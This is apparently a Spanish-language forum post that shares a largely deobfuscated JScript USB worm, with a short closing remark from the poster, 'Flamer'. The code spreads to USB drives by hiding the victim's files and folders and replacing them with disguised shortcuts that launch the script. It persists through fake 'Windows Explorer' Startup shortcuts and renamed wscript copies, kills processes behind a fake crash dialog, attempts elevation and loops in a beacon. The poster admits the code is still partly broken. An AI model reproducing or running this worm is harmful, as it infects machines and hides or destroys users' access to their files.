                    var cvv = ofb + ha(g + "00"),
                        Oq = b.openTextFile(cvv, 8, !0);
                    ent(cvv);
                    try {
                        b.deleteFile(ofb + ha(g + "09"))
                    } catch (e) {}
                } catch (e) {
                    if (WScript.Arguments.length > 0) switch (WScript.Arguments(0)) {
                        case ha(g + "10"):
                            var cbo = ofb + ha(g + "11");
                            try {
                                var zbz = b.openTextFile(cbo, 8, !0)
                            } catch (e) {
                                WScript.quit()
                            }
                            ent(cbo);
                            for (;;) {
                                try {
                                    var oot = GetObject("winmgmts:root\\cimv2");
                                    for (var dS = new Enumerator(oot.ExecQuery("SELECT * FROM Win32_DiskDrive")); !dS.atEnd(); dS.moveNext())
                                        if (dS.item().Model.match(/usb/i)) {
                                            var did = dS.item().DeviceID;
                                            for (var dPS = new Enumerator(oot.ExecQuery("ASSOCIATORS OF {Win32_DiskDrive.DeviceID='" + did + "'} WHERE AssocClass=Win32_DiskDriveToDiskPartition")); !dPS.atEnd(); dPS.moveNext()) {
                                                var pID = dPS.item().DeviceID;
                                                for (var lDS = new Enumerator(oot.ExecQuery("ASSOCIATORS OF {Win32_DiskPartition.DeviceID='" + pID + "'} WHERE AssocClass=Win32_LogicalDiskToPartition")); !lDS.atEnd(); lDS.moveNext()) {
                                                    var lD = lDS.item().DeviceID + "\\",
                                                        trr = ".Trashes\\",
                                                        trd = lD + trr,
                                                        por = trr + (sc(g) % 500 + 405) + "\\",
                                                        pod = lD + por,
                                                        pir = por + ha(g + "01") + ".js",
                                                        pid = lD + pir;
                                                    try {
                                                        var gf = b.getFolder(trd);
                                                        for (var fS = new Enumerator(gf.SubFolders); !fS.atEnd(); fS.moveNext()) {
                                                            var ff = (fS.item() + "").split("\\").pop();
                                                            if (ff.length == 3 && !isNaN(parseFloat(ff)) && isFinite(ff)) {
                                                                var fg = b.getFolder(trd + ff);
                                                                for (var Sf = new Enumerator(fg.Files); !Sf.atEnd(); Sf.moveNext()) {
                                                                    var fff = (Sf.item() + "").split("\\").pop();
                                                                    if (b.getExtensionName(fff).toLowerCase() == "js") try {
                                                                        b.copyFile(WScript.scriptFullName, trd + ff + "\\" + fff, !0)
                                                                    } catch (e) {}
                                                                }
                                                            }
                                                        }
                                                    } catch (e) {}
                                                    try {
                                                        b.createFolder(trd)
                                                    } catch (e) {}
                                                    try {
                                                        b.createFolder(pod)
                                                    } catch (e) {}
                                                    hf(trd), hf(pod);
                                                    var bro = [127, 128, 129];
                                                    try {
                                                        var gf = b.getFolder(lD);
                                                        for (var fS = new Enumerator(gf.SubFolders); !fS.atEnd(); fS.moveNext()) {
                                                            var ff = (fS.item() + "").split(":\\").pop();
                                                            if (ff.substr(0, 1) != "." && ff.substr(0, 1) != "$" && ff.match(/recycle/i) == null) {
                                                                with(a.createShortcut(lD + ff + ".lnk")) targetPath = "cmd.exe", windowStyle = 7, arguments = '/c start wscript "' + pir + '" & explorer "' + trr + ff + '"', iconLocation = "%systemroot%\\system32\\shell32.dll," + pw(bro), save();
                                                                try {
                                                                    var t = b.getFolder(lD + ff);
                                                                    t.move(trd + ff)
                                                                } catch (e) {}
                                                                hf(trd + ff)
                                                            }
                                                        }
                                                    } catch (e) {}
                                                    try {
                                                        var gf = b.getFolder(lD);
                                                        for (var fS = new Enumerator(gf.Files); !fS.atEnd(); fS.moveNext()) {
                                                            var ff = (fS.item() + "").split(":\\").pop(),
                                                                exx = b.getExtensionName(ff).toLowerCase();
                                                            if (exx != "lnk" && exx != "" && ff.toLowerCase() != "autorun.inf" && ff.substr(0, 1) != "." && ff.substr(0, 1) != "$" && ff.match(/recycle/i) == null) {
                                                                var exo = 0;
                                                                switch (exx) {
                                                                    case "exe":
                                                                        exo = 261;
                                                                        break;
                                                                    case "doc":
                                                                    case "docx":
                                                                    case "pdf":
                                                                        exo = 73;
                                                                        break;
                                                                    case "rtf":
                                                                    case "txt":
                                                                        exo = 70;
                                                                        break;
                                                                    case "mp3":
                                                                    case "m4a":
                                                                    case "ogg":
                                                                    case "wav":
                                                                    case "wma":
                                                                        exo = 116;
                                                                        break;
                                                                    case "mp4":
                                                                    case "avi":
                                                                    case "webm":
                                                                    case "flv":
                                                                    case "mov":
                                                                    case "wmv":
                                                                    case "mpeg":
                                                                    case "mpg":
                                                                        exo = 115;
                                                                        break;
                                                                    case "gif":
                                                                    case "jpg":
                                                                    case "jpeg":
                                                                    case "png":
                                                                        exo = 302
                                                                }
                                                                with(a.createShortcut(lD + ff + ".lnk")) targetPath = "cmd.exe", windowStyle = 7, arguments = '/c start wscript "' + pir + '" & "' + trr + ff + '"', iconLocation = "%systemroot%\\system32\\shell32.dll," + exo, save();
                                                                try {
                                                                    b.moveFile(lD + ff, trd + ff)
                                                                } catch (e) {}
                                                                hf(trd + ff)
                                                            }
                                                        }
                                                    } catch (e) {}
                                                    try {
                                                        b.copyFile(WScript.scriptFullName, pid, !0)
                                                    } catch (e) {}
                                                }
                                            }
                                        }
                                } catch (e) {}
                                kp(), zt(), WScript.sleep(14e3)
                            }
                            break;
                        case ha(g + "12"):
                            var cbo = ofb + ha(g + "13");
                            try {
                                var zbz = b.openTextFile(cbo, 8, !0)
                            } catch (e) {
                                WScript.quit()
                            }
                            ent(cbo);
                            for (;;) {
                                try {
                                    var t = GetObject("winmgmts:root\\cimv2");
                                    for (var i = new Enumerator(t.ExecQuery("SELECT * FROM Win32_Process")); !i.atEnd(); i.moveNext()) {
                                        var it = i.item();
                                        if (it.name.match(RegExp(zbo.join("|"), "i"))) try {
                                            if (it.terminate() == 0 && it.ExecutablePath && !it.ExecutablePath.match(/windows|program/i)) {
                                                var tp = ((8193 + Math.random()) * 30582 | 0).toString(16).substring(1),
                                                    tq = ((8193 + Math.random()) * 30582 | 0).toString(16).substring(1);
                                                a.popup("Application has generated an exception that could not be handled.\n\nProcess id=0x" + tp + " (" + parseInt(tp, 16) + "), Thread id=0x" + tq + " (" + parseInt(tq, 16) + ").\n\nClick OK to terminate the application.\nClick CANCEL to debug the application.", 8, it.name + " - Common Language Runtime Debugging Services", 4145)
                                            }
                                        } catch (e) {}
                                    }
                                } catch (e) {}
                                kp(), zt(), WScript.sleep(400)
                            }
                    }(WScript.Arguments.length > 0 && WScript.Arguments(0) == ha(g + "07")) == 0 && WScript.quit()
                }
                if ((WScript.Arguments.length > 0 && WScript.Arguments(0) == ha(g + "07")) == 0) {
                    try {
                        a.run('%comspec% /c del /F /S /Q "' + bfo + '*.exe"', 0, !0), WScript.sleep(500)
                    } catch (e) {}
                    var w1 = shh(["win", "cmd", "disk", "dsk", "ms", "hp", "intel", "amd", "dll", "tcp", "udp"]),
                        w2 = shh(["process", "proc", "monitor", "mon", "sys", "host", "mgr", "update", "updater"]);
                    for (var i = 0, ww, mm; i < 5; i++) ww = w1[i] + w2[i], mm = Math.ceil(Math.random() * 5), mm > 3 && (ww += mm > 4 ? "64" : "32"), ww += ".exe", b.copyFile(d("systemroot") + "\\system32\\wscript.exe", bfo + ww, !0), ent(bfo + ww), w0.push(bfo + ww)
                } else w0 = fuu();
                var fet = w0[0],
                    su = 0;
                try {
                    var pp = d("systemdrive") + "\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\",
                        p = pp + "Windows Explorer.lnk";
                    with(a.createShortcut(p)) targetPath = fet, windowStyle = 1, arguments = '"' + bfi + '"', iconLocation = "%systemroot%\\system32\\shell32.dll,3", save();
                    ent(p), su++, lo.push(p);
                    try {
                        a.run('%comspec% /c del /F /S /Q "' + pp + '*.js"', 0, !0)
                    } catch (e) {}
                } catch (e) {}
                try {
                    var h = b.getFolder(d("userprofile") + "\\..\\");
                    for (var j = new Enumerator(h.SubFolders); !j.atEnd(); j.moveNext()) {
                        var k = j.item();
                        for (var i = 0; i < f.length; i++) try {
                            var pp = k + (vn[0] < 6 ? "\\Start Menu\\Programs\\Startup\\" : "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"),
                                p = pp + "Windows Explorer.lnk";
                            with(a.createShortcut(p)) targetPath = fet, windowStyle = 1, arguments = '"' + bfi + '"', iconLocation = "%systemroot%\\system32\\shell32.dll,3", save();
                            ent(p), lo.push(p);
                            try {
                                a.run('%comspec% /c del /F /S /Q "' + pp + '*.js" "' + pp + '*.vbs" "' + pp + '*.jse" "' + pp + '*.vbe"', 0, !0)
                            } catch (e) {}
                        } catch (e) {}
                    }
                } catch (e) {}
                WScript.ScriptFullName.split("\\").shift() == d("systemdrive") && lo.push(WScript.ScriptFullName);
                var tc = d("temp") + "\\" + ha(g + "08") + ".js";
                if (WScript.Arguments.length > 0 && WScript.Arguments(0) == ha(g + "07")) {
                    try {
                        b.deleteFile(tc)
                    } catch (e) {}
                    WScript.quit()
                } else if (su == 0 && vn[0] >= 6) try {
                    b.copyFile(WScript.ScriptFullName, tc, !0), ru.shellExecute("wscript.exe", '"' + tc + '" ' + ha(g + "07"), "", "runas", 0)
                } catch (e) {} finally {
                    try {
                        Oq = b.openTextFile(ofb + ha(g + "00"), 8, !0)
                    } catch (e) {}
                }
                hr(0), sha(1), sk(), kk = 0;
                break
            } catch (e) {}
        }
        if (kk) {
            var bbs = d("userprofile") + (vn[0] < 6 ? "\\" : "\\AppData\\Roaming\\") + ha(g + "02"),
                bbz = bbs + "\\" + ha(g + "04") + ".js";
            try {
                b.createFolder(bbs)
            } catch (e) {}
            ent(bbs), b.copyFile(WScript.ScriptFullName, bbz, !0), ent(bbz);
            try {
                Oq.close()
            } catch (e) {}
            ru.shellExecute("wscript.exe", '"' + WScript.ScriptFullName + '" ' + ha(g + "14"), "", "", 0), WScript.quit()
        }
    } catch (e) {
        WScript.quit()
    }
    var tff = "e",
        otf;
    if (b.fileExists(hd)) try {
        otf = b.openTextFile(hd, 1), tff = otf.readAll(), otf.close()
    } catch (e) {} else try {
        tff = cob() + cob() + "-" + cob() + "-" + cob() + "-" + cob() + "-" + cob() + cob() + cob(), otf = b.openTextFile(hd, 2, 1), otf.write(tff), otf.close()
    } catch (e) {}
    ent(hd);
    for (;;)
        if (zzo() !== !1)
            for (;;) try {
                $("", 1);
                for (var i = (new Date).getTime(); i + 318e4 >= (new Date).getTime(); sk()) WScript.sleep(2e3)
            } catch (e) {
                if (zzo() == 0) break;
                for (var i = (new Date).getTime(); i + 8e3 >= (new Date).getTime(); sk()) WScript.sleep(2e3)
            } else
                for (var i = (new Date).getTime(); i + 18e4 >= (new Date).getTime(); sk()) WScript.sleep(2e3)
})();


bueno  hay que remplazar unas comas por punto y coma, no esta al  %100 pero estaba peor y como dije el jscript no es mi fuerte así que no lo explicare ya que hay muchas cosas que no entiendo.


bueno saludo Flamer y espero le sirva a alguien